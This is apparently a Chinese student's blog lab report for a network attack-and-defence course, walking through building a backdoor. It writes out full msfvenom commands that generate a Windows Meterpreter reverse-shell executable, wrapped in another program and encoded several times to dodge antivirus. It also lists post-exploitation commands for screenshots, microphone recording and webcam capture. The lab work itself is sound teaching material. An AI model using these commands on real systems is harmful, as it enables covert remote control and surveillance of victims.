标签:bit 防火 lin hot 比较 很多 文件 comm ldl
- 用man socat命令查看socat的介绍及相关用法: (socat图)
后门就是一个程序。
我们接下来学习如何使用msfenom生成后门可执行文件。我们要生成的这个后门程序是Meterpreter. 揭开Meterpreter的神秘面纱介绍了meterpreter的一些底层原理。
简单粗暴msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.235.137 LPORT=5212 -f exe > 20165212backdoor.exe 指令生成一个exe后门程序。完整指令是:msfvenom -p windows/meterpreter/reversetcp -x ./fenix.exe -e x86/shikataganai -i 5 -b ‘\x00’ LHOST=192.168.235.137 LPORT=5212 -f exe > 20165212backdoor.exe
参数说明:
(传送成功的图)
说明:
现在去win中双击运行20165212_backdoor.exe,点了是没反应的 ,然后切回kali,通过msf的监听进程获得win的主动链接,并得到远程控制shell
获取截屏:screenshot (截屏命令图(抓的屏图12))
获取音频:record_mic
获取摄像头和录像:webcamsnap/webcamstream。我的没成功,win7上没有驱动,我会尽快搞定 (摄像头失败)
getuid获取运行msf会话的用户名,从而查看当前会话具有的权限
实验内容较多,尤其是是meterpreter实践,有很多很多事可以做,我只写了看起来重要且常用的一些指令,更多的请参考《Metasploit渗透测试魔鬼训练营》。本次实验在一个理想化程度很高的环境下完成,这样在现实中是没有任何意义的。相比较于msf中花里胡哨的操作,我觉得更重要的还是去研究有堆栈保护、有杀软、有防火墙的环境下如何渗透目标,哪怕是一个bit,因为要在那样的基础上我们后续的实验、操作才有可行性。或者是几个人凑各团队,每个人负责一块。
markdown里传图片功能坏了,我...
2018-2019-2 20165212《网络对抗技术》Exp2 后门原理与实践
标签:bit 防火 lin hot 比较 很多 文件 comm ldl
原文地址:https://www.cnblogs.com/FenixRen/p/10562400.html